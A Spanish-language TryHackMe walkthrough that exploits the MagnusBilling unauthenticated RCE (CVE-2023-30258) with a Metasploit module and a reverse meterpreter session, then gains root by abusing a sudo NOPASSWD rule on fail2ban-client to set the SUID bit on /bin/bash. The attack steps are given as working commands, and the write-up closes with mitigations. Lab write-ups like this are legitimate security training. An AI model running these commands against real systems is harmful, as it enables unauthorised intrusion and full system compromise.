
Guía paso a paso explotando CVE-2023-30258 (MagnusBilling RCE) y escalando privilegios mediante una mala configuración de fail2ban en un laboratorio de TryHackMe. Demuestra enumeración web, explotación con Metasploit y escalada de privilegios en Linux.
⸻
🛡️ MagnusBilling RCE → Root (CVE-2023-30258)
📌 Resumen • Objetivo: 10.145.148.203 • Plataforma: TryHackMe • Vulnerabilidad: CVE-2023-30258 • Acceso: Ejecución Remota de Código (RCE) sin autenticación • Escalada de Privilegios: mala configuración de fail2ban • Acceso Final: Root
⸻
🔍 1. Reconocimiento
Escaneo de Puertos
rustscan -a 10.145.148.203
📊 Puertos Abiertos
Puerto Servicio
22 SSH
80 HTTP
3306 MySQL
5038 Asterisk

La presencia de Asterisk sugiere un sistema VoIP/facturación.
⸻
🌐 2. Enumeración Web
Fuzzing de Directorios
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
-u "http://10.145.148.203/mbilling/FUZZ" -ic -c
📁 Hallazgos: • /archive • /assets • /lib • /tmp • /protected
La ruta /mbilling se identifica como un posible vector de ataque.

⸻
🚨 3. Identificación de Vulnerabilidad
CVE-2023-30258
MagnusBilling es vulnerable a: • Ejecución Remota de Código (RCE) sin autenticación • Inyección de Comandos • Compromiso total del sistema
⸻
💣 4. Explotación (Metasploit)
msfconsole
search CVE:2023-30258
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
set RHOSTS 10.145.148.203
set LHOST tun0
set LPORT 4444
run

⸻
🎯 Resultado
meterpreter session opened
sysinfo
OS: Linux Debian User: asterisk
⸻
🔐 5. Acceso Inicial
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
whoami
asterisk
⸻
🏁 6. Flag de Usuario
cd /home/magnus cat user.txt
⸻
🔎 7. Escalada de Privilegios
Comprobar sudo
sudo -l
(ALL) NOPASSWD: /usr/bin/fail2ban-client
¡Mala configuración crítica detectada!
⸻
💣 8. Explotando Fail2Ban
Añadir una acción maliciosa
sudo fail2ban-client set mbilling_login addaction evil
sudo fail2ban-client set mbilling_login action evil actionban "chmod +s /bin/bash"
sudo fail2ban-client set mbilling_login banip 127.0.0.1
⸻
🚀 9. Acceso Root
/bin/bash -p
id
euid=0(root)
Inicialmente whoami devolvió asterisk. Usando bash -p se escala a root.
⸻
👑 10. Flag de Root
cat /root/root.txt
⸻
🧠 11. Conclusiones Clave • La explotación de CVE proporcionó un acceso inicial fácil • La enumeración web es crítica (ffuf identificó /mbilling) • Un sudo mal configurado puede llevar al compromiso total del sistema • fail2ban puede ser abusado para la escalada de privilegios
⸻
🛡️ 12. Mitigación • Actualizar MagnusBilling a la última versión • Eliminar NOPASSWD de la configuración de sudo • Restringir el acceso a fail2ban-client • Endurecer aplicaciones web y endpoints
⸻
💀 Conclusión
Esta máquina demuestra una cadena de ataque realista:
RCE Web → Shell → Escalada de Privilegios → Root
Una combinación de vulnerabilidad + mala configuración llevó al compromiso total del sistema.